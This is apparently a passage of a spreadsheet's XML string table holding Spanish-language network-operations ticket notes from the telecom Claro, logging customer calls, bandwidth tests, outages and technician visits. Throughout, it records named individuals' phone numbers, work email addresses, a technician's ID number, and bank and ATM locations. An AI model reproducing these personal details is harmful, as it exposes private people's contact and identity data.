CC: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CENTRO DE MONITOREO &lt;HNB-NOC@FICOHSA.COM&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;; DARWIN ENRIQUE MOTIÑO RAMOS &lt;DARWIN.MOTINO@FICOHSA.COM&gt;; JAIME OSCAR MOLINA ORDONEZ &lt;JAIME.MOLINA@FICOHSA.COM&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: NUEVO DISPOSITIVO ENLACE CLARO FICOHSA - SM LA COLONIA MEGAMALL
BUENAS NOCHES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS AL DATA CENTER DE MEGAMALL , ES NECESARIO REALIZAR UNA VISITA EN CONJUNTO CON PERSONAL DE SOPORTE DE MEGAMALL PARA QUE ELLOS REALICEN REVISIÓN DE SU MEDIA CONVERTER.
LA VISITA ES A PARTIR DE LAS 11:00HRS</t>
  </si>
  <si>
    <t>F4576874</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VIVIAN  VILLAGRAN AL 47531820 INDICA QUE YA NO ESTA EN TIENDA SOLICITA QUE SE LE LLAME A LA SEÑORITA  JENIFER TREJO AL 52842469 **
ID 2001200008 - 2001200842
**</t>
  </si>
  <si>
    <t>SE LLAMA A VIVIAN PARA REALIZAR PRUEBAS ---
47531820</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JENIFER TREJO AL 52842469 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001201140
**</t>
  </si>
  <si>
    <t>F4576876</t>
  </si>
  <si>
    <t>SE REALIZARON PRUEBAS A NIVEL DE ANCHO DE BANDA SE REVIZA CON JUNTA MENTE CON EL CLIENTE EL CUAL VERIFICA Y AFRIMA QUE NO SE CORRECTAMENTE. SE ADJUNTA EN EL TTK EL CAPTURA DE EL ANCHO DE BANDA DEL COMPUTADOR DEL CLIENTE Y SE ENCUENTRA LLEGANDO CORRECTAMENTE AL ANCHODE BANDA .</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE AUN PERCIBE INESTABILIDAD PERO POR PARTE DE CLARO NO SE RECIBE LAS PERDIDAS, CLIENTE INDICA QUE ENVIARA PRUEBAS CON RESPECTO AL SERVICIO PARA SEGUIMIENTO--
 ID1029468SV || F4576876</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ULISES HERNANDEZ  75841401 CLIENTE MOLESTO INFORMA QUE AYER NO LE LLAMARON A LAS 10 PM, SOLICITA VISITA TECNICA PERO CONFIRMARA EL DIA LUNES A QUE HORA SE PODRA REALIZAR LA CERTIFICACION DE ANCHO DE BANDA.</t>
  </si>
  <si>
    <t xml:space="preserve">
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 22:43
PARA: UHERNANDEZ@OBRASMUNICIPALES.GOB.SV &lt;UHERNANDEZ@OBRASMUNICIPALES.GOB.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO ANCHO DE BANDA SD1128657
ESTIMADO CLIENTE EL DIA DE HOY HACE UNOS MOMENTOS SE RALIZARON UNAS PRUEBAS CON MI PERSONA Y EL TECNICO SALVADOR CON EL CUAL PUDIMOS COMPROBAR QUE EL ANCHO DE BANDA SE ESTA LLEGANDO CORRECTAMENTE AL CONTRATADO COMO SE HABLO CON USTED VIA TELEFONICA SE ESTARÁ VALIDANDO A NIVEL DE SW SI ENCONTRAMOS ALGÚN INCONVENIENTE DE INTERMITENCIA O SATURACIÓN QUE AFECTE A SU ENLACE EN ALGÚN MOMENTO SE PROCEDE CON ENVIARLE LAS PRUEBAS DEL ANCHO DE NADA DE BAJADA
A LA ESPERA DE SU CONFIRMACIÓN CON EL SERVICIO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES HERNANDEZ  75841401 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001269481
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ULISES HERNANDEZ 75841401 MENCIONA QUE ESTAN PRESENTANDO MUCHA PERDIDA DE PAQUETES, CLIENTE SOLICITA PODER APLICAR UN REINICIO PERO UNICAMENTE SE PUEDE REALIZAR EN EL HORARIO DESPUES DE LAS 22:00
-ID 2001156040</t>
  </si>
  <si>
    <t>SE LLAMA A ASALVADOR PORITLLO SE ENCUENTRA EN EL LUGAR ESPERANDO ACCESOS POR PARTE DEL CLIENTE.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENE ULISES HERNANDEZ AL 75841401 - 76019142 EN EL PRIMER NUMERO NO RESPONDE Y EL SEGUNDO INDICA QUE AUN SIGUE VIENDO PERDIDA DE PAQUETES || SE NOTIFICA  A GESTOR **
ID 2001137564 - 2001137779
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES HERNANDEZ  AL 75841401 INDICA QUE POR MOMENTOS SE TIENE INESTABILIDAD SOLICITA QUE SE LE LLAME A LAS 16:00 HRS NUEVAMENTE PARA CONFIRMAR **
ID 2001302859
**</t>
  </si>
  <si>
    <t>F4576877</t>
  </si>
  <si>
    <t>SE LLAMA A RUBEN HERNANDEZ AL 33404734 PARA SEGUIMIENTO DEL CASO SIN EMBARGO ENVIA A BUZON---</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A RUBEN PARA SEGUIMIENTO DEL CASO Y VALIDAR SI ES POSIBLE REINICIAR EQUIPOS DE CLARO. SIN EMBARGO CLIENTE NO RESPONDE----ENVIA A BUZON-</t>
  </si>
  <si>
    <t>F4576878</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 42192176 CONTESTA EL SEÑOR AXEL PEREZ INDICA QUE AUN NO TIENE SEÑAL ||
SE NOTIFICA A GESTOR **
ID 2001120044
**</t>
  </si>
  <si>
    <t>F4576881</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MARCO MARTINEZ 78616175 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001139786
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO MARTINEZ 78616175 NO RESPONDE,SE INTENTARA LUEGO
-ID 2001141625</t>
  </si>
  <si>
    <t>F4576882</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. RENATO LORENZANA 23049696 VALIDARA TEMAS DE ENERGIA EN SITIO REMOTO, SOLICITA DEJAR INCIDENTE EN MONITOREO, SE LLAMARA EL FINALIZAR LA TARDE...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RENATO LORENZANA 23049696 MENCIONA QUE PRESENTARON PROBLEMAS DE ENERGIA EN PR
-ID 2001206276</t>
  </si>
  <si>
    <t>F4576896</t>
  </si>
  <si>
    <t>INFORMA CLIENTE TANIA MORALES 70700425 QUE LUEGO DE REINICIAR LA PBX YA NO SE PRESENTÓ EL INCONVENIENTE, SE REALIZA PRUEBA LLAMANDO AL 25263677 Y SE LE ESCUCHA CLARAMENTE, SOLICITA SE LE LLAME A LAS 16:00 HORAS PARA VALIDAR EN LO QUE REALIZAN PRUEBAS. ID DE LLAMADA: 2001155357</t>
  </si>
  <si>
    <t>CLIENTE TANIA INDICA QUE TIENE RUIDO EN SUS LLAMADAS, SE LLAMA AL 25263677 Y SÍ SE PERCIBE LLAMADA ROBOTIZADA, CLIENTE INDICA QUE LA PERSONA QUE TIENE LAS LLAVES DEL CUARTO DONDE ESTÁN SUS EQUIPOS NO SE ENCUENTRA EN ESTE MOMENTO, POR LO QUE SOLICITA SE LE LLAME DE VUELTA A LAS 12:40 PM PARA VERIFICAR EQUIPOS. ID 2001123151</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE TANIA MORALES 70700425 QUIEN COMENTA QUE SE ENCUENTRAN REALIZANDO PRUEBAS YA QUE EL INCONVENIENTE PUEDE SER A NIVEL INTERNO. SOLICITA SE LE LLAME A LAS 16:00 HORAS PARA VALIDAR.</t>
  </si>
  <si>
    <t>F4576904</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRAYAN ALVIZURES 24119191 EXT 10583 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001194101</t>
  </si>
  <si>
    <t>F4576905</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISAYANA MENDOZA AL 77309403 || SE CONTACTA A CLIENTE Y SE DEJA EN CONFERENCIA CON GESTOR **
ID 2001142695
**</t>
  </si>
  <si>
    <t>SE REALIZA CONFERENCIA CON CLINETE ISAYANA Y TECNICO JEFREY MENDOZA SE VALIDA LA DIRECCION Y TECNICO COMENTA QUE ESTA A 45 MINUTOS DE LAS INSTALACIONES DE CLIENTE
2001159268
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:01:17
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 25/05/2022 13:27:35</t>
  </si>
  <si>
    <t>F4576906</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE SOLICITANDO DATOS DE PERSONAL DE PR, PARA REALIZAR PRUEBAS DE PRIMER NIVEL.
ASUNTO:  SOLICITUD DE SOPORTE ::: ID LOCAL 1613947OH::: TICKET CNOC IMBBL004014::: "ENLACE CAIDO"
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITAMOS DE SU APOYO BRINDANDO ALGÚN NÚMERO DE CONTACTO DE PERSONAL DE EN SITIO PARA REALIZAR PRUEBAS DE PRIMER NIVEL, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS
SALUDOS.
.</t>
  </si>
  <si>
    <t>F4576910</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN  LAS LLAMADA COMPLETAN
NOS ATIENDE INDICA JOHN BELTRAN QUIEN CONFIRMA QUE NO HA PRESENTADO PROBLEMAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE LLAMADAS ENTRANTES SI PUEDEN RECIBIR SIN EMBARGO EL SERVICIO SE CORTA POR MOMENTOS, CLIENTE INDICA QUE DONDE ESTA EL EQUIPO HAY UNA CAJA PEGADA A LA PARDE QUE LOS CABLES LO TIENEN DAÑADO COMENTA QUE ESTAN COMO QUEBRADOS, CLIENTE INDICA QUE CUANDO MUEVEN EL CABLEADO EL SERVICIO RESTABLECE, SOLICITA QUE SE ENVIE PERSOANL TECNICO A REVISAR LAS CONEXIONES EN EL LUGAR PARA REPARAR ESE DAÑO, NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE SALVADOR  79511317  PARA VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE SALVADOR ALBERTO SANTANA 79511317 Y 24206400 PARA REALIZAR PRUEBAS Y CONSULTAR LA AFECTACION PERO DESPUES DE DOS VECES DE INTENTAR LLAMARLO NOS MANDA A BUZON
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4576919</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE EL PROBLEMA SE PRESENTO EN LA MAÑANA POR LO QUE SOLICITA SE PUEDA VALIDAR O COMPARTIR GRAFICAS
-ID 2001129881</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 JULIAN SALAZAR MENCIONA QUE NO ESTA LLEGANDO AL ANCHO DE BANDA CONTRATADO, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001207425</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR SAUL ORELLANA CONFIRMA SERVICIO ESTABLE **
AUTORIZA CIERRE DE TICKET **
ID 2001268727
**</t>
  </si>
  <si>
    <t>F4576937</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ACEVEDO 71705548 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001688927</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS ACEVEDO AL 71705548  INFORMA QUE HACE POCO LE CAMBIARON EL EQUIPO PERO CUANDO SE VA LA ENERGIA NO SE ENLAZA EL QUIPO AL DE EL Y  TIENE QUE ESTAR REINICIANDO  LOS EQUIPOS SOLICITA QUE SE LE  VERIFIQUE EL PUERTO SI ESTA APAGADO O DE QUE MANERA YA NO PASE ESO QUE EL TENGA QUE ESTAR REINICIANDO || SE NOTIFICA A GESTOR **
ID 2001160490
**</t>
  </si>
  <si>
    <t>F4576941</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YANIRA ORELLANA 79551361 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001146441</t>
  </si>
  <si>
    <t>F4576954</t>
  </si>
  <si>
    <t>SE LLAMARA A CLIENTE PARA REALIZAR PRUEBAS DE PRIMER NIVEL...
41549528  &gt;&gt;&gt; SE VALID NO SE COMPLTA LLAMADA.</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A BRYAN RAMOS/CLIENTE PARA REALIZAR PRUEBAS; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELÉFONO APOYA DARWIN ESPAÑA/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN</t>
  </si>
  <si>
    <t>SE PROCEDIO A ENVIAR CORREO A INGENIERIA NO SE LOGRA UBICAR DISEÑO DEL CLIENTE. ADICIONAL SE LLAMO A CLIENTE PARA SOLICITAR DIRECCIONAMIENTO IP LAN PERO NO RESPONDIO--</t>
  </si>
  <si>
    <t>F4576967</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTES SRTA. VERÓNICA DOMÍNGUEZ 35596951 ...</t>
  </si>
  <si>
    <t>F4576976</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE HENRY MIGUEL 42672005 CONFIRMA QUE EL SERVICIO ESTA ACTIVO, SE PROCEDE AL CIERRE DEL TICKET
2001165284
COLA:
NOMBRE: A: 42672005
NÚMERO: 42672005
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:00:52
DETALLES: 42672005
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 25/05/2022 13:47:07</t>
  </si>
  <si>
    <t>F4577009</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE +52 55 5174 5290 MENCIONA QUE YA CUENTAN CON EL TICKET INTERNO CERRADO
-ID 2001354426</t>
  </si>
  <si>
    <t>SERVICIO SE ENCUENTRA ESTABLE, SE ENVIO CORREO A CLIENTE DEMOSTRANDO UNA SATURACION EN DIAS ANTERIORES, ACTUALMENTE OPERATIVO Y ESTABLE, A LA ESPERA QUE NOS  CONFIRME  COMO OBSERVAN EL SERVICIO.</t>
  </si>
  <si>
    <t>F4577012</t>
  </si>
  <si>
    <t>RESPUESTA DEL CLIENTE
DE: MARVIN TOC &lt;MTOC@5B.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 13:53PARA: CAJEROS AUTOMATICOS &lt;CAJEROS.AUTOMATICOS@BANRURAL.COM.GT&gt;; AGE CALDERON. KATHERIN &lt;KATHERIN.CALDERON@BANRURAL.COM.GT&gt;; AGE GIRON, WALTER &lt;WALTER.GIRON@BANRURAL.COM.GT&gt;; AGE SANAIN, HUGO &lt;VICTOR.SANAIN@BANRURAL.COM.GT&gt;; ATM FUENTES, YERLYN &lt;YERLYN.FUENTES@BANRURAL.COM.GT&gt;; ATM HERNANDEZ, VERNEL &lt;VERNEL.HERNANDEZ@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: ENLACE ALARAMDO PARA CLIENTE "CC_TYT_GT_ATM0421"
BUENA TARDE @CAJEROS AUTOMATICOS
SOLICITANDO SU APOYO CON INFORMAR A EL ENCARGADO DEL ATM 421 CON LA REVISIÓN DE EQUIPOS DE COMUNICACIÓN SEGÚN CORREO QUE ANTECEDE
SALUDOS
MARVIN TOC
ANALISTA DE ATM¿S
MTOC@5B.COM.GT
(502) 2420-7200 EXT 2360</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 13:46PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARAMDO PARA CLIENTE "CC_TYT_GT_ATM042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L CAJERO SE ENCUENTRA ACTIVO POR EL ENLACE 3G POR LO QUE POSIBLEMENTE PRESENTE TIEMPOS ALTOS DE RESPUESTA.
TICKET: F4577012
ID: 47500583T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0421
UBICADO EN:  CAJERO 3641 FARMACIA GALENO 126, 6 AV. 7-004 ZONA 1 MAZAT
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4577030</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE MARIANO SALAZAR 58397699 || SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 2001173068
**</t>
  </si>
  <si>
    <t>SE LLAMA AL CL MARIANO SALAZAR AL 58397699 ID 2001232886 ATIENDE Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE YA PUEDEN CERRAR LA FALLA Y TICKET EL SERVICIO LO VEN OPERATIVO.  SE NOTIFICA AL GESTOR SAMUEL.ESTRADAG VIA SKYPE EL CAMBIO</t>
  </si>
  <si>
    <t>F4577038</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ISRAEL GONZÁLEZ/CLIENTE, SE LE INDICA QUE SE HABLARÁ CON PR PARA DETALLES; SE PIDE APOYO A CNOC CLARO VÍA SKYPE; SE LLAMÓ DOS VECES A GESTOR ASIGNADO, NO CONTESTA.
POR TERCERA VEZ CONTESTA ESAU SANDOVAL/GESTOR CNOC; SE LE INDICA QUE SE TIENE EN LÍNEA A DELSI CIFUENTES/PR; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4577052</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS || PENDIENTE CONFIRMACIÓN
ASUTNO: VISITA TÉCNICA IP2129144SV || BANCO DE FOMENTO AGROPECUARIO || AGENCIA AHUACHAPÁN
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO IP2129144SV || BANCO DE FOMENTO AGROPECUARIO || AGENCIA AHUACHAPÁN AV. FRANCISCO MENENDEZ NORTE Nº1-3, B°. EL CENTRO, AHUACHAPÁN.
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA VERIFICAR MEDIO Y EQUIPOS POR LO CUAL SOLICITAMOS NOS APOYEN GESTIONANDO ACCESOS PARA PERSONAL TÉCNICO QUE ATENDERÁ LA VISITA EL DÍA DE MAÑANA JUEVES 26/05 A PARTIR DE LAS 8:00 HRS.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>|| CLIENTE CONFIRMA ACCESOS PARA VISITA MAÑANA JUEVES 8:00 HRS ||
VISITA TÉCNICA IP2129144SV || BANCO DE FOMENTO AGROPECUARIO || AGENCIA AHUACHAPÁN
MARCO MARTÍNEZ,GTI-DP &lt;MARCO.MARTINEZ@BFA.GOB.SV&gt;
BUENAS TARDES
PERMISOS GESTIONADOS PARA
JUEVES 26 DE MAYO E 8:00 AM. A 4:00 P.M.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MARCO MARTÍNEZ AL 22410951  -78616175 CL SOLICITA QUE SE LE VUELVA A LLAMADA EN 7 MIN || SE NOTIFICA A GESTOR **
ID 2001175117 - 2001175279
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO MARTÍNEZ AL 22410951  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001296009
**</t>
  </si>
  <si>
    <t>F4577053</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ROJAS 55312227 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001211025</t>
  </si>
  <si>
    <t>F4577058</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KATHERINE REINOZA 78517254 MENCIONA QUE ESTARA VALIDANDO TEMAS DE PRIMER NIVEL CON PR, SOLICITA LLAMADA PARA LAS 15 HRS
-ID 2001177570</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KATHERINE REINOZA 78517254 MENCIONA QUE YA APLICO REINICIO PERO PERSISTE EL ICONVENIENTE
-ID 2001189607
NOMBRE DEL CLIENTE: BANCO DE FOMENTO AGROPECUARIO
UBICACIÓN:BARRIO EL CALVARIO TEOTEPEQUE LA LIBERTAD
CONTACTO EN SITIO: 77497397
HORARIO DE ATENCION:8:00 - 12:00 Y 13:00 - 15:00
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECICO -- KATHERINE.REINOZA@BFA.GOB.SV
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4577082</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR MIGUELAN.RODRIGUEZ POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE, ESTIMADOS VALIDAR MEDIANTE SD, SE SOLICITO A CLIENTE VALIDAR SUS CONEXIONES ELECTRICAS Y QUE LOS EQUIPOS ESTEN CONECTADOS A UPS.
ASUNTO:  SOLICITUD DE VALIDACIÓN 8901193T || BANCO DE DESARROLLO RURAL, S.A.</t>
  </si>
  <si>
    <t>F4577096</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELA BALICO 87437048 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 2001180088</t>
  </si>
  <si>
    <t>F4577103</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001325262</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN ORELLANA 44990369   NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001270988
**</t>
  </si>
  <si>
    <t>F4577104</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN MANZO AL 46261534 SOLICITA QUE SE LE LLAME EN 5 MIN NUEVAMENTE **
ID 2001271318
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN MANZO AL 46261534  || SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 2001283170
**</t>
  </si>
  <si>
    <t>EN SEGUIMIENTO A CRONOLOGÍA DEL GESTOR JHONSER SE VALIDARA CON EL PERSONAL TÉCNICO POR LO QUE NO HAY NADA PENDIENTES POR PARTE DEL CLIENTE,  POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR JHONNSER.ESCOBAR POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4577105</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ACOSTA 78515000 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 2001181503</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ACOSTA 78515000 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001360481</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ACOSTA 78515000 PERO NO RESPONDE, TONO DE DESCONECTADO SE INTENTARA LUEGO**
-ID 2001389450
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ACOSTA 78515000 - 72413990 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001220359 - 2001220436</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SR. ACOSTA 78515000 - 72413990 MENCIONA QUE YA APLICARON REINICIO PERO EL SERVICIO ES DEMASIADO INTERMITENTE
-ID 2001234447 - 2001234527
NOMBRE DEL CLIENTE: SAN ISIDRO FOTOVOLTAICA, S.A.
UBICACIÓN: KILOMETRO 68 CANTON IZCATAL SAN IZIDRO CABAÑAS
CONTACTO EN SITIO: YANSI ARIAS - 72413990
HORARIO DE ATENCION:8:00 - 17:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4577123</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE EVER GARCÍA 77872779 Y 73977009 PARA VALIDAR EL SERVICIO PERO NO RESPONDE, FAVOR CC SV CONFIRMAR CON CLIENTE EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EVER GARCIA, QUIEN ESTA UBICANDO LOS EQUIPOS.
2001172685
COLA:
NOMBRE: A: 0050377872779
NÚMERO: 0050377872779
DURACIÓN: 0:00:12
ESTADO: MARCANDO
DETALLES: 0050377872779
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 25/05/2022 14:10:52</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE.
SE DARA SEGUIMIENTO EL DIA DE MAÑANA.
BUENAS TARDES,
POR ESTE MEDIO SOLICITO DE SU APOYO CON EL INGRESO AL TÉCNICO:
04271773-2 MIGUEL DUEÑAS RIVERA
A SUS INSTALACIONES UBICADAS EN :
CHALCHUAPA CARRETERA A CHALCHUAPA KM 75 ZONA FRANCA DIEZ EDF 1 BY PASS
PARA REVISIÓN DEL E1 TELEFÓNICO 24893100.
EQUIPO QUE INGRESA EL TÉCNICO:
EQUIPOS DE MEDICION
GRENLEE PARA MEDION DE COBRE
MICROTELEFONO
MODEM DE REPUESTO
LAPTOP
MAQUINAS PONCHADORAS</t>
  </si>
  <si>
    <t>F4577139</t>
  </si>
  <si>
    <t>*]*SE LLAMA A CLIENTE AL PDV 78827058  NO RESPONDE, SE INTENTARA LUEGO **
ID 2001199046
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001187236</t>
  </si>
  <si>
    <t>F4577150</t>
  </si>
  <si>
    <t>SE HABLA CON GUILLERMO MARTINEZ 78443687 QUIEN INDICA QUE CONTINÚA REVISANDO EL INCONVENIENTE CON SU PROVEEDOR. SOLICITA QUE SE LE ENVÍE CORREO CON LOS DETALLES ENCONTRADOS PARA PROCEDER CON EL CIERRE DEL CASO.  ID DE LLAMADA: 2001339027</t>
  </si>
  <si>
    <t>F4577151</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30727797 MARLON  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001418633</t>
  </si>
  <si>
    <t>F4577153</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ AL 78471779 - 78601531 NO RESPONDE EN EL PRIMER NUMERO Y EL SEGUNDO CONTESTA EL SEÑOR ENRIQUE ESPERANZA QUIEN CONFIRMAR SERVICIO ESTABLE Y OPERATIVO **
ID 2001339278 - 2001339578
**</t>
  </si>
  <si>
    <t>SE VALIDARON PRUEBAS DE PRIMER NIVEL CON CLIENTE JOSE PEREZ
NÚMERO: 0050378471779
FIN: HOY, 15:06
ID DE LLAMADA: 2001186655</t>
  </si>
  <si>
    <t>F4577156</t>
  </si>
  <si>
